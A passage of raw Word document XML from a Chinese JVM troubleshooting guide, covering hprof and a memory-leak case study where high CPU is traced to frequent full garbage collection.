          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  hprof能够展现CPU使用率，统计堆内存使用情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00081EB8" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>J2SE 5.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>以后的版本中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HPROF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>已经被并入到一个叫做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java Virtual Machine Tool Interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM TI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11.7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存泄漏实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(1) top</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>命令查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进程的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>占用率，几乎达到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>400%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（服务器为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>核）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>vmstat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4418385" cy="1921017"/>
            <wp:effectExtent l="19050" t="0" r="1215" b="0"/>
            <wp:docPr id="60" name="图片 7" descr="&lt;1&g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lt;1&gt;"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId97" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4418663" cy="1921138"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00F23041" w:rsidRDefault="00092B5A" w:rsidP="00092B5A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="00F23041">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>问题猜测</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>程序长时间占用系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>占用率</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>100%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085104" w:rsidRDefault="00085104" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>病毒引起的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00940835">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00940835">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>程序存在死循环</w:t>
      </w:r>
      <w:r w:rsidR="00D35FC3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(jstack</w:t>
      </w:r>
      <w:r w:rsidR="00D35FC3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>打印函数的堆栈信息</w:t>
      </w:r>
      <w:r w:rsidR="00D35FC3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00940835">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>程序存在严重内存泄漏，导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>频繁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>full GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，从而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>占用率高，造成服务器假死</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Minor GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的特点是发生频率高，执行速度也极快，对系统效率的影响并不是很大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>年老代中用来存放从年轻代过来的长时间使用的对象，大部分的</w:t>
      </w:r>
      <w:r w:rsidRPr="00692655">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00692655">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>内存溢出错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>均发生在这个区域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>当年老代被过度占用，无法存放下更多的数据时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会发起一次年老代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GC(Major GC\Full GC),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>该类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会释放年老代中的资源，虽然该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>触发频率很低，但是对硬件资源的消耗较高，且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Full GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>过程中会暂停该线程的执行。如果系统中存在内存泄露，频繁的触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Full GC,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将会严重的占用服务器资源，造成应用的假死，这也是我之前猜测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
